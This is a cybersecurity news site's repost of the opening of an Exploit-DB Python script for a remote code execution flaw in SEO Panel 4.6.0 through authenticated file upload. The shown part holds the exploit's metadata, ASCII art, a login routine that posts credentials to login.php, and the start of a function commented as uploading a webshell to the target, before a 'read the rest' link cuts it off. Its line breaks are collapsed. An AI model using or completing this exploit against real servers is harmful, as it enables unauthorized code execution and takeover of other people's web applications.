[webapps] SEO Panel 4.6.0 - Remote Code Execution (2)

Feb 5, 2021 02:00 pm Cyber Security 307
[webapps] SEO Panel 4.6.0 - Remote Code Execution (2)
# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2)
# Date: 22 Jan 2021
# Exploit Author: Kr0ff
# Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/
# Software Link: https://www.seopanel.org/spdownload/4.6.0
# Version: 4.6.0
# Tested on: Ubuntu 20.04 #!/usr/bin/env python3 '''
DESCRIPTION: - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload FIXED: - ver 4.7.0 AUTHOR: - Kr0ff
'''
#https://asciiart.website/index.php?art=animals/bats try: import requests import argparse import sys from termcolor import colored from time import sleep
except ImportError as e: print(colored("[ERROR]: ", "red"), f"{e}") def arty(): artz = """ HAPPY HALLOWEEN ! ....._ `. ``-. .-----.._ `, `-. .: /` : `".. ..-`` : / ...--:::`n n.`::... : `:`` .` :: / `. ``---..:. ` .` ._: .-: :: `. .-`` : : :_\_/: : .:: `. / : / -../:/_.`-` : :: _.._ q` p ` /` | :-` ``(_. ..-----hh``````/-._: `: `` / ` E: / : _/ : _..-`` l--``
---------------------------------------------------------- _ ___ ___ ___ ___ __ ___ ___| |___ ___ ___
|_ -| -_| . | . ||. | | -_| | _| _| -_|
|___|___|___| _|___|_|_|___|_|_| |___|___| |_| 4.6.0 @Kr0ff
----------------------------------------------------------
""" print(artz) #Initialize requests to create a session
r = requests.session() #Create a login for the user
def login(TARGET, USER, PASS): data = {"sec":"login", "red_referer": f"{TARGET}", "userName": f"{USER}", "password": f"{PASS}","login":""} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} req = r.post(f"{TARGET}/login.php", headers=headers, data=data, verify=False) if req.status_code == 200: print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {req.status_code}
") else: print(colored("[FAILURE]", "red"), f"Status code for login.php -> {req.status_code}
") print("Please check if you are providing the right path to 'seopanel' or if server is live...") get_ch = req.headers.get("Set-Cookie") return get_ch #Upload the webshell to target server
def exploit(TARGET, USER, PASS): login(TARGET, USER, PASS) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml; ..

Support the originator by clicking the read the rest link below.
webapps panel remote execution
Read The Rest from the original source
exploit-db.com

Related News

Be in Touch

All Rights Reserved #1 Source for Cyber Security News, Reports and Threat Intelligence
Powered By The Internet!!!!